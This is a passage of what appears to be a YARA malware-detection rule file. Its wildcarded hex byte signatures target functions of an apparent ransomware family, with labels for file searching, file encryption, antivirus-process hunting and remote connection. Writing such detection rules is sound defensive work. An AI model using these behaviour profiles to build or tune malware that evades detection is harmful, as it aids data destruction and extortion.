?? ?? ?? ?? 8D 54 24 ?? C7 44 24 ?? ?? - ?? ?? ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 57 8B 3D ?? ?? ?? ?? FF D7 68 ?? ?? ?? ?? 6A ?? 56 FF D7 8B 74 24 ?? 68 ?? ?? ?? - ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 FF D7 FF 74 24 ?? 8D 34 46 FF D3 50 56 - 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? 68 ?? ?? ?? ?? - 56 FF 15 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 8D 34 46 FF D3 50 56 6A ?? 57 6A ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 - ?? 8B 35 ?? ?? ?? ?? FF D6 8B F8 6A ?? C1 E7 ?? 68 ?? ?? ?? ?? 83 C7 ?? 57 6A ?? FF - 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D6 8D 0C C5 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 - 74 ?? 3B CF 73 ?? 8B F8 EB ?? 33 FF FF 74 24 ?? FF D6 8B 0D ?? ?? ?? ?? 89 44 24 ?? - 85 C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? FF D6 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 34 00 - 8B D6 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 - 68 ?? ?? ?? ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 57 FF - D3 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D - 48 ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 - F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 - 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 - ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 51 8D 54 24 ?? C7 44 24 ?? - ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? - ?? 50 8B 44 24 ?? 50 FF D3 8B 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? - 6A ?? FF 74 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 8D 4C 24 ?? E8 ?? ?? - ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 - } - $find_files = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF - 15 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 66 89 03 83 FE ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 8B 5D ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? - ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 FF 15 - ?? ?? ?? ?? 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 75 - ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 01 03 59 11 53 - ?? 59 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 75 ?? 8B 45 ?? 33 - C9 66 89 08 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF - 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 - } - $find_files_v2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF D6 8D 85 ?? ?? ?? ?? 50 - 57 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0B 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? 5F 5E 5B - 8B E5 5D C3 8B 5D ?? EB ?? 8D A4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 F6 85 ?? ?? ?? ?? ?? 74 ?? 68 - ?? ?? ?? ?? 57 FF D6 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB - ?? FF 75 ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 83 C4 - ?? 01 03 11 53 ?? 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 35 ?? - ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C3 - } - $search_antivirus_processes = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A - ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ?? - 89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ?? - ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ?? - 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85 - F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 - 5D C3 - } - $search_antivirus_processes_v2 = { - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? - ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? - ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? - ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8B F0 6A ?? 89 74 24 ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? C7 03 ?? - ?? ?? ?? 83 FE ?? 74 ?? 53 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4B ?? 33 F6 EB - ?? 8D A4 24 ?? ?? ?? ?? 90 51 FF 74 B4 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 73 ?? 50 - 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 8B 3D ?? ?? - ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 46 8D 4B ?? 83 FE ?? 72 ?? 8B 74 24 ?? 53 56 FF - 15 ?? ?? ?? ?? 8D 4B ?? 85 C0 75 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? - ?? ?? 56 FF D7 5F 5E 5B 8B E5 5D C3 - } - $find_files_v2_1 = { - 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? - ?? F7 D8 1B C0 40 75 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? - ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 3C 46 89 7D ?? FF D3 8D 85 ?? ?? - ?? ?? 50 56 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0F 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? - 5F 5E 5B 8B E5 5D C3 8B 7D ?? EB ?? 8D 9B ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D3 F6 85 ?? ?? - ?? ?? ?? 74 ?? 83 7D ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 ?? FF 75 ?? E8 ?? ?? - ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 - ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 89 45 ?? 8B 47 ?? 6A ?? 89 45 ?? FF 15 ?? ?? ?? ?? 56 8B D8 68 ?? ?? ?? ?? - 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 6A ?? - 53 FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 45 ?? 8B 4D ?? EB ?? 83 BD ?? ?? ?? - ?? ?? 0F 57 C0 66 0F 13 45 ?? 72 ?? 51 FF 75 ?? 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 89 55 - ?? EB ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF 15 ?? ?? ?? - ?? 8B 45 ?? 8B 4D ?? 01 0F 11 47 ?? 8B 45 ?? 3B 47 ?? 77 ?? 72 ?? 8B 45 ?? 3B 07 73 - ?? 8B 45 ?? FF 00 8B 1D ?? ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 - C0 5B 8B E5 5D C3 - } - $crypt_files_v2_1 = { - FF 15 ?? ?? ?? ?? 33 D2 89 44 24 ?? 89 44 24 ?? 8D 0C B7 8D 0C CD ?? ?? ?? ?? 85 C0 - 74 ?? 3B CB 73 ?? 8D 3C 01 89 44 24 ?? 89 7C 24 ?? 8B D1 EB ?? 89 54 24 ?? 8B F8 8B - 4D ?? 8D 34 CD ?? ?? ?? ?? 85 C0 74 ?? 8D 0C 32 89 4C 24 ?? 3B CB 73 ?? 8B 54 24 ?? - 8B CF 89 7C 24 ?? 03 FE 89 7C 24 ?? EB ?? 33 C9 89 4C 24 ?? 8B 74 24 ?? 85 C0 74 ?? - 8D 04 F5 ?? ?? ?? ?? 03 C2 3B C3 72 ?? 33 FF 89 7C 24 ?? 8B 1D ?? ?? ?? ?? 85 C9 0F - 84 ?? ?? ?? ?? 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 - ?? ?? ?? ?? 52 FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? - 56 FF 74 24 ?? FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C6 - ?? 03 C6 68 ?? ?? ?? ?? 50 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 C7 - 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 74 24 ?? FF D3 40 85 F6 74 ?? 3B 44 24 ?? 73 ?? - 8D 0C 06 89 44 24 ?? 89 4C 24 ?? 89 74 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 - 40 85 F6 74 ?? 03 44 24 ?? 3B 44 24 ?? 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 - F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 8B 7C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? - 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 - FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? EB ?? 8D 49 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? - 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 8B 1D ?? - ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 56 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 3C 46 57 E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 - ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? - FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 47 - FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 - C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? 66 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 58 58 8D 44 24 ?? 50 57 FF - D3 8B 5C 24 ?? 8B 35 ?? ?? ?? ?? 53 FF D6 6A ?? C1 E0 ?? 83 C0 ?? 68 ?? ?? ?? ?? 50 - 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F8 53 89 7C 24 ?? FF D6 8D 04 C5 ?? ?? ?? ?? - 85 FF 74 ?? 3B 44 24 ?? 72 ?? 33 FF 53 FF D6 8B 0D ?? ?? ?? ?? 8B F0 89 74 24 ?? 85 - C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 6A ?? 68 ?? ?? ?? ?? - 53 FF 15 ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? - 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 5C 24 ?? 03 F6 8B D6 8B CB E8 ?? - ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? - ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 57 FF D3 - 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D 48 - ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 F6 - FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 - 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 ?? - 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 7C 24 ?? 8D 54 24 ?? 6A ?? 57 8B - CE C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 - ?? ?? ?? ?? 50 8B 44 24 ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 68 ?? ?? - ?? ?? 6A ?? FF 74 24 ?? FF D3 33 F6 EB ?? 8B 4C 24 ?? 85 C9 74 ?? 8B 45 ?? 89 08 8B - 44 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 - 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 EB ?? 8B 7C 24 ?? 83 7C 24 ?? ?? - 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D3 BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? - FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B C6 5E 5B 8B E5 5D C3 - } - $remote_connection_v2_1 = { - 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 ?? ?? - ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 FF D6 - 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 ?? ?? - ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 - ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 - 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF 15 ?? - ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 EC ?? - 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 FF 75 ?? 8B 75 ?? 8D 4D ?? 56 E8 - ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? C7 45 ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 - FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF - D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F - 5E 5B 8B E5 5D C3 - } - $search_antivirus_processes_v4_1_2 = { - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ?? - 89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ?? - ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ?? - 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85 - F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 - 5D C3 - } - $find_files_v4_1_2 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 - 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 - ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? - 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ?? - ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? - 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 